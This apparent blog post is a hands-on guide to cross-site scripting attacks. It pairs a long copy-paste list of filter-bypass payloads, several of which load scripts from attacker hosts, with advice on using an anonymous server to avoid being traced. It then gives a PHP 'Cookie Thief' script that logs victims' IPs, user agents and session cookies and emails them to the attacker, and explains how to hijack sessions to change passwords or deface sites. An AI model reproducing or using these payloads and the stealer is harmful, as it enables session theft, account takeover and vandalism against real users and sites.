Thursday, April 30, 2015

XSS attack Cross site server scripting

as needed
an exploitable webserver filter
an exploitable computer browser

There is no magic bullet.

Also needed; a free small anonymously acquired  with  a Random; Access Point, MAC, IP, User agent and header information,  names, dates  & places, anything that can be forged and turned off (without breaking connectivity or leaving a finger print in and of itself) shall be with no repeat patterns unless it is a most common shared public factor.



One can bypass server xss filters by the use of different encoding methods;
http://alihassanpenetrationtester.blogspot.com/2013/05/cross-site-scripting-xss-bypass-encoder.html

Use these exploits to test for vulnerabilities in the web filter of  the server in question with this
https://addons.mozilla.org/en-us/firefox/addon/xss-me/ & the latest version of Firefox.
PATH TOO XSS ME:Tools =>XSS ME=>Open XSS Me sidebar.

Copy and paste the following exploits it in the application field shown below in addition to the existing code.
PATH:Tools =>XSS ME=>Options=>XSS Strings.



Start Copy Here--------------------------------------------------------

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

 <SCRIPT SRC="http://evil-site.com/xss.jpg"></SCRIPT>

 <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 

 <SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>

';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>

<img src="javascript:alert('XSS');">

 <img src=javascript:alert(&quot;XSS&quot;)>

<img src=javascript:alert(String.fromCharCode(88,83,83))>

<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<iframe src=http://evil-site.com/evil.html <

<SCRIPT>x=/XSS/  alert(x.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')"> 

 <BGSOUND SRC="javascript:alert('XSS');">

 <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> 

 <IMG SRC='vbscript:msgbox("XSS")'>

'';!--"<XSS>=&{()}  


';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


<IMG SRC="javascript:alert('XSS');">




<IMG SRC=javascript:alert('XSS')>



<IMG SRC=JaVaScRiPt:alert('XSS')>


<IMG SRC=javascript:alert("XSS")>



<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>




<IMG """><SCRIPT>alert("XSS")</SCRIPT>">




<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>




<IMG SRC=# onmouseover="alert('xxs')">




<IMG SRC= onmouseover="alert('xxs')">




<IMG onmouseover="alert('xxs')">




<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>




<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>




<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>




<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>




<IMG SRC="jav ascript:alert('XSS');">




<IMG SRC="jav&#x09;ascript:alert('XSS');">




<IMG SRC="jav&#x0A;ascript:alert('XSS');">




<IMG SRC="jav&#x0D;ascript:alert('XSS');">




perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out




<IMG SRC=" &#14;  javascript:alert('XSS');">




<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>




<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>




<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>





<<SCRIPT>alert("XSS");//<</SCRIPT>




<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >





<SCRIPT SRC=//ha.ckers.org/.j>





<IMG SRC="javascript:alert('XSS')"





<iframe src=http://ha.ckers.org/scriptlet.html <





\";alert('XSS');//





</script><script>alert('XSS');</script>





</TITLE><SCRIPT>alert("XSS");</SCRIPT>





<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">





<BODY BACKGROUND="javascript:alert('XSS')">





<IMG DYNSRC="javascript:alert('XSS')">





<IMG LOWSRC="javascript:alert('XSS')">





<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>





<IMG SRC='vbscript:msgbox("XSS")'>





<IMG SRC="livescript:[code]">





<BODY ONLOAD=alert('XSS')>





<BGSOUND SRC="javascript:alert('XSS');">





<BR SIZE="&{alert('XSS')}">





<LINK REL="stylesheet" HREF="javascript:alert('XSS');">





<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">





<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>





<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">





<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>





<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>





<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">





exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>





<STYLE TYPE="text/javascript">alert('XSS');</STYLE>





<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>





<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>






<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>




<XSS STYLE="xss:expression(alert('XSS'))">





<XSS STYLE="behavior: url(xss.htc);">





¼script¾alert(¢XSS¢)¼/script¾





<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">





<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">





<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">





<IFRAME SRC="javascript:alert('XSS');"></IFRAME>





<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>





<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>





<TABLE BACKGROUND="javascript:alert('XSS')">





<TABLE><TD BACKGROUND="javascript:alert('XSS')">





<DIV STYLE="background-image: url(javascript:alert('XSS'))">





<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">





<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">





<DIV STYLE="width: expression(alert('XSS'));">





<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->





<BASE HREF="javascript:alert('XSS');//">





 <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>





EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
org/xss.swf" AllowScriptAccess="always"></EMBED>





<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>





a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);





<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>





<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>





<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>





<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>




<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->




<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>





<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">





<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">





 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-





<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>





<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>





<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>





<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>





<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>





<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>





<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>





<A HREF="http://66.102.7.147/">XSS</A>





<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>





<A HREF="http://1113982867/">XSS</A>





<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>





<A HREF="http://0102.0146.0007.00000223/">XSS</A>





<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>





<A HREF="//www.google.com/">XSS</A>





<A HREF="//google">XSS</A>





<A HREF="http://ha.ckers.org@google">XSS</A>





<A HREF="http://google:ha.ckers.org">XSS</A>





<A HREF="http://google.com/">XSS</A>





<A HREF="http://www.google.com./">XSS</A>





<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>





<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>





%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

End Copy Here--------------------------------------------------------

















You may now proceed to scan for XSS vulnerabilities as pictured above. 





Once a vulnerability  is found the plugin will notify you via a chart of the known server vulnerabilities and hits.



lets assume we have a positive hits on the following exploits;




<IMG SRC="javascript:alert('XSS')"










<BGSOUND SRC="javascript:alert('XSS');">














We then must use a suitable payload...;



Payload A:The Cookie Thief script.



Steals the following and emails it to a email address that you prove:


IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie 









<IMG SRC="http://YourAnonymousSite.info/somethingrandomA.php"




<BGSOUND SRC="http://YourAnonymousSite.info/somethingrandomA.php">





Save this script as "somethingrandomA.php" (remove the A) upload onto your free small anonymously acquired  (Random; Access Point,  IP,  User agent and header information, MAC, names, dates  & places registered) server.







REMEMBER; One can bypass server xss filters by the use of different encoding methods;

















<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();








mail(“hackerid@mailprovider.com”, ”Stolen Cookies”, IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n);






?>






<?php

$cookie = $HTTP_GET_VARS["cookie"]; mail(“hackerid@mailprovider.com”, ”Stolen Cookies”, $cookie);
?>



















































































Once you have The cookie in hand, One may use https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/ to add the cookies to Firefox. You will then own the session of the user still logged in allowing you to act as they do on a the target website until they log out. Change passwords, Deface the page, gather cyber intel, do as thy wilt.



































Payload B:Universal JavaScript for setting homepage 



But what too set the home page too? http://b1tsh1fter.blogspot.com/2015/05/puffinfacebookfisher.html Is but one of many payloads you can set the homepage too. 



only works for i.e. and mozilla


<IMG SRC="http://YourAnonymousSite.info/cookielogger.php"




<BGSOUND SRC="http://YourAnonymousSite.info/cookielogger.php">




Save this  script as "somethingrandomB.php" (remove the B) upload onto your anonymous server.



REMEMBER; One can bypass server xss filters by the use of different encoding methods;






<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>












Posted by



at







































No comments:















Post a Comment


















        

      









Subscribe to:
Post Comments (Atom)